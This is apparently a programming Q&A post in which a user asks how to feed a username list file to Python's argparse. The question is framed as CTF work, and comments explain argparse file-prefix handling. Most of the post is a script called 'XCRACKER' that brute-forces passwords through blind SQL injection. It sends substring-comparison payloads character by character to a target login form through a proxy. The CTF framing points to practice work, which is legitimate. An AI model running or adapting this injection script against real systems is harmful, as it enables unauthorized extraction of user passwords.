# How can I pass a .txt file to arguments in Python?

Tags: python-3.x, argparse

I'm trying to find a way to be able to pass a .txt file to the users argument. I've tried using `(fromfile_prefix_chars='@')` but without any luck. (It read the file but it doesn't read the whole list) It'll only work if there's only 1 username in the list.

I want it to read the first username in the list, get the password and then switch to the next username in the list.

This is for a ctf i'm working on.

Thank you!

```py
import requests
import argparse
import pyfiglet

from pyfiglet import Figlet
custom_fig = Figlet(font='aquaplan')
print(custom_fig.renderText('XCRACKER'))

from argparse import ArgumentParser
parser = ArgumentParser(fromfile_prefix_chars='@') 
parser.add_argument("-t", "--url", help="target")
parser.add_argument("-p", "--proxy", help="Proxy with port")
parser.add_argument("-u", "--users", help="User name list")

args = parser.parse_args()

print( "url {} proxy {} users {} ".format(
        args.url,
        args.proxy,
        args.users,
        ))

letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()"

for user in args.users:
    data = {"Username": '', "Password": "' or username= '" + user + "'or substring(Password,1,1)='p' or'"}
    request = requests.post(args.url, data=data, proxies={'http':args.proxy})
    length = len(request.text)
    p4ss = ''
    for i in range(1,25):
        for l in letters:
            data = {"Username": '', "Password": "' or username= '" + "{}".format(args.users) + "'or substring(Password,{},1)='{}' or'".format(str(i),l)}
            request1 = requests.post(args.url, data=data, proxies={'http':args.proxy})
            if "{}@".format(args.users) in request1.text and len(request1.text) != 6756:
                print("Positive response for user '{}' , the letter is: '{}' trying the next one...".format(args.users, l))
                p4ss += l
                print(str(i))
                print(str(p4ss))
                pass
```

Comment: You mean, input the entire text of the file? What's wrong with just passing the filename as a string and reading said file the usual way with `open()`, etc.?

Comment: That could work but is there a way I can call any files names? and adding a path to that list?

Comment: The `prefix_file` mechanism just inserts the text from the file into the `sys.argv` list before doing any further parsing.  So it's just an alternative to entering '--user xxx --proxy foobar ...' on the commandline.  https://docs.python.org/3/library/argparse.html#customizing-file-parsing describes the default reader and suggests an alternative.  You could write something fancier if you want.  Just remember all this is done before parsing.